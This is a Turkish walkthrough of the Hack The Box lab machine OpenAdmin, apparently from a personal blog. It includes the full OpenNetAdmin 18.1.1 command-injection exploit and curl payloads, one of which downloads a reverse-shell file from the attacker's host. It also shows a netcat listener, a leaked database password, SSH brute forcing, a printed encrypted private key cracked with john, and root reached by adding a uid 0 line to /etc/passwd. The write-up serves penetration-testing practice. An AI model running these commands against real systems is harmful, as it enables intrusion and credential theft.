İçeriğe geç

OpenAdmin

Makine Adı Seviye OS Logo
OpenAdmin - HTB Kolay Linux

Walkthrough

Nmap taraması ile başlayalım.

[*] Scan: 9
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 21:59 EDT
Nmap scan report for 10.10.10.171
Host is up (0.25s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/17%OT=22%CT=1%CU=40349%PV=Y%DS=2%DC=T%G=Y%TM=60F38EB
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O
OS:3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   120.51 ms 10.10.16.1
2   326.87 ms 10.10.10.171

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 960.96 seconds

Bunun üzerine 80. port için nikto ve gobuster taramalarını başlattım.

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# gobuster dir --url http://10.10.10.171/ --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirb/big.txt --no-error | tee gobuster1

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.171/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sql,bash,pcap,rar,conf,sh,php,txt,zip,7z,html,bak,php5,cap
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/07/17 19:59:23 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.171/.htaccess.sql        (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.sql        (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.bash       (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.sh         (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd/           (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.php5       (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.html       (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.php        (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.html       (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.rar        (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.php5       (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.cap        (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.cap        (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.bak        (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.rar        (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.pcap       (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.conf       (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.php        (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.bak        (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.txt        (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess/           (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.zip        (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.7z         (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.7z         (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.pcap       (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.sh         (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.txt        (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.bash       (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.zip        (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.conf       (Status: 403) [Size: 277]
http://10.10.10.171/artwork/             (Status: 200) [Size: 14461]
http://10.10.10.171/icons/               (Status: 403) [Size: 277]  
http://10.10.10.171/index.html           (Status: 200) [Size: 10918]
http://10.10.10.171/music/               (Status: 200) [Size: 12554]
http://10.10.10.171/server-status/       (Status: 403) [Size: 277]  
http://10.10.10.171/sierra/              (Status: 200) [Size: 43029]

gobuster taramaları esnasında http://10.10.10.171/music/ adresinde bir uygulama çalıştığını gördüm ve bu uygulamanın version bilgiside mevcuttu. Bununla alakalı exploit taraması gerçekleştirdim.

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# searchsploit opennetadmin          
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                                                                                                               | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                                                                                                                | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                                                                                                                 | php/webapps/47691.sh
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# cp $(locate php/webapps/47691.sh) .

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# cat 47691.sh                       
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done                                                                                                                                                                                                                                              
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";whoami;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
www-data

Harika! Bir RCE'miz var. Makinede çalışmakta olduğum klasörde yazma hakkım vardı. Bunun üzerine içeriye bir reverse shell upload ettim.

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";wget http://10.10.16.56:1111/reverse4kuday.php;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";ls -al;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 
total 132
drwxrwxr-x 10 www-data www-data  4096 Jul 18 00:33 .
drwxr-x---  7 www-data www-data  4096 Nov 21  2019 ..
-rw-rw-r--  1 www-data www-data  1970 Jan  3  2018 .htaccess.example
-rw-r--r--  1 www-data www-data 12288 Jul 17 20:08 .reverse.php.swp
drwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 config
-rw-rw-r--  1 www-data www-data  1949 Jan  3  2018 config_dnld.php
-rw-rw-r--  1 www-data www-data  4160 Jan  3  2018 dcm.php
-rwxr-xr-x  1 www-data www-data  5494 Jul 17 19:43 diohan.php
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 images
drwxrwxr-x  9 www-data www-data  4096 Jan  3  2018 include
-rw-rw-r--  1 www-data www-data  1999 Jan  3  2018 index.php
-rw-r--r--  1 www-data www-data     0 Jul 18 00:31 kuday
drwxrwxr-x  5 www-data www-data  4096 Jan  3  2018 local
-rw-rw-r--  1 www-data www-data  4526 Jan  3  2018 login.php
-rw-rw-r--  1 www-data www-data  1106 Jan  3  2018 logout.php
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 modules
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 plugins
-rw-r--r--  1 www-data www-data  1111 Jul 17 08:46 reverse.php
-rw-r--r--  1 www-data www-data  5493 Jul 18 00:19 reverse4kuday.php
-rw-r--r--  1 www-data www-data  5495 Jul 17 20:02 rshell.php
-rw-r--r--  1 www-data www-data    76 Jul 17 19:57 shell.php
-rw-r--r--  1 www-data www-data    73 Jul 17 19:40 shell.php.1
-rw-r--r--  1 www-data www-data    76 Jul 17 19:57 shell.php.2
-rw-r--r--  1 www-data www-data  5493 Jul 17 18:18 supaShell.php
drwxrwxr-x  2 www-data www-data  4096 Jan  3  2018 winc
drwxrwxr-x  3 www-data www-data  4096 Jan  3  2018 workspace_plugins

Reverse shell'i tarayıcı üzerinden tetiklediğimde dinleme noktama shell düşmüştü.

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# nc -lvp 1234         
listening on [any] 1234 ...
10.10.10.171: inverse host lookup failed: Unknown host
connect to [10.10.16.56] from (UNKNOWN) [10.10.10.171] 43070
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 00:34:10 up 1 day,  3:10,  0 users,  load average: 3.43, 4.79, 3.99
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.171  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:3463  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:3463  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:34:63  txqueuelen 1000  (Ethernet)
        RX packets 2797350  bytes 376270029 (376.2 MB)
        RX errors 0  dropped 863  overruns 0  frame 0
        TX packets 2762041  bytes 949913630 (949.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 277881  bytes 20887608 (20.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 277881  bytes 20887608 (20.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

İçeride gezinirken db config dosyası buldum.

?>$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>$ 

hydra ile ssh bruteforce yaptığım esnada saldırıyı durdurdum ve kullanıcılarla burdaki parlayı denemesini sağladım. Böyle bir kullanıcı tespit ettim.

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# hydra -L users -P passwords ssh://10.10.10.171
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-17 21:02:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 2 tasks per 1 server, overall 2 tasks, 2 login tries (l:2/p:1), ~1 try per task
[DATA] attacking ssh://10.10.10.171:22/
[22][ssh] host: 10.10.10.171   login: jimmy   password: n1nj4W4rri0R!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-17 21:02:55
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# ssh [email protected]                        
[email protected]'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 18 01:13:37 UTC 2021

  System load:  0.82              Processes:             244
  Usage of /:   53.4% of 7.81GB   Users logged in:       0
  Memory usage: 49%               IP address for ens160: 10.10.10.171
  Swap usage:   0%

  => There are 6 zombie processes.

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Jul 17 20:42:12 2021 from 10.10.14.131
jimmy@openadmin:~$ 

İçeride bilgi toplama aşamasındayken ilginç bir şey farkettim.

---
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
tcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*     
tcp    LISTEN   0        128             127.0.0.1:52846          0.0.0.0:* 

3306 mysql'di ancak 52846 ne olduğu hakkında bir bilgim yoktu. Bunun bir web servisi olduğunu anladım ve www altındaki internal klasöründeki kodları deploy edebileceğini düşündüm.

jimmy@openadmin:/var/www/internal$ ls
total 20
drwxrwxrwx 2 jimmy internal 4096 Nov 23  2019 .
drwxr-xr-x 4 root  root     4096 Nov 22  2019 ..
-rwxrwxrwx 1 jimmy internal 3229 Nov 22  2019 index.php
-rwxrwxrwx 1 jimmy internal  185 Nov 23  2019 logout.php
-rwxrwxrwx 1 jimmy internal  339 Nov 23  2019 main.php
jimmy@openadmin:/var/www/internal$ cat main.php 
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Görüldüğü üzere main.php joanna kullanıcısının ssh key'ini ekrana basıyor. Denedim ve başarılı oldum.

jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Ancak dosya şifrelenmişti john ile hızlı bir şekilde kırabildim.


┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# /usr/share/john/ssh2john.py id 
id:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d

┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# /usr/share/john/ssh2john.py id > ssh2john
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# john ssh2john --wordlist=/usr/share/wordlists/rockyou.txt                                1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2021-07-17 22:02) 0.2475g/s 3549Kp/s 3549Kc/s 3549KC/sa6_123..*7¡Vamos!
Session completed

Artık bağlantı kurabiliriz.


┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# ssh [email protected] -i id                            
Enter passphrase for key 'id': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 18 02:15:39 UTC 2021

  System load:  1.35              Processes:             238
  Usage of /:   53.4% of 7.81GB   Users logged in:       1
  Memory usage: 49%               IP address for ens160: 10.10.10.171
  Swap usage:   0%

  => There are 6 zombie processes.

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Jul 17 21:21:40 2021 from 10.10.14.131
joanna@openadmin:~$ 

Şimdi ilginç bir şey yapacağız. Ama öncesinde flagimizi alalım.

joanna@openadmin:~$ alias ls="ls -al"
joanna@openadmin:~$ ls
total 44
drwxr-x--- 6 joanna joanna 4096 Jul 17 23:47 .
drwxr-xr-x 4 root   root   4096 Nov 22  2019 ..
lrwxrwxrwx 1 joanna joanna    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna  220 Nov 22  2019 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22  2019 .bashrc
drwx------ 2 joanna joanna 4096 Nov 22  2019 .cache
drwx------ 3 joanna joanna 4096 Nov 22  2019 .gnupg
drwxrwxr-x 3 joanna joanna 4096 Nov 22  2019 .local
-rw------- 1 joanna joanna  170 Jul 17 23:47 nano.save
-rw-r--r-- 1 joanna joanna  807 Nov 22  2019 .profile
drwx------ 2 joanna joanna 4096 Nov 23  2019 .ssh
-rw-rw-r-- 1 joanna joanna   33 Nov 28  2019 user.txt
joanna@openadmin:~$ cat user.txt 
c9**********************************

Kullanıcının aşağıda gördüğünüz gibi nano'yu root olarak çalıştırabilme hakkı var.

joanna@openadmin:/home$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Yetki yükseltmeyi şu şekilde yaptım, root haklarında nano aracıyla /opt/priv'y açtım. Ancak daha sonra nano'nun içindeyken /etc/passwd dosyasını a.masını istedim ve son satırına aşağıdaki eklemeyi yaptımm.

joanna@openadmin:~$ sudo /bin/nano /opt/priv
joanna@openadmin:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
user:$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms/:0:0:root:/root:/bin/bash

Şifre ksımını oluştururken openssl'den yardım aldım.

─(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# openssl passwd -1 
Password: 
Verifying - Password: 
$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms/
joanna@openadmin:~$ su user
Password: 
root@openadmin:/home/joanna# id
uid=0(root) gid=0(root) groups=0(root)
root@openadmin:/home/joanna# cd /root
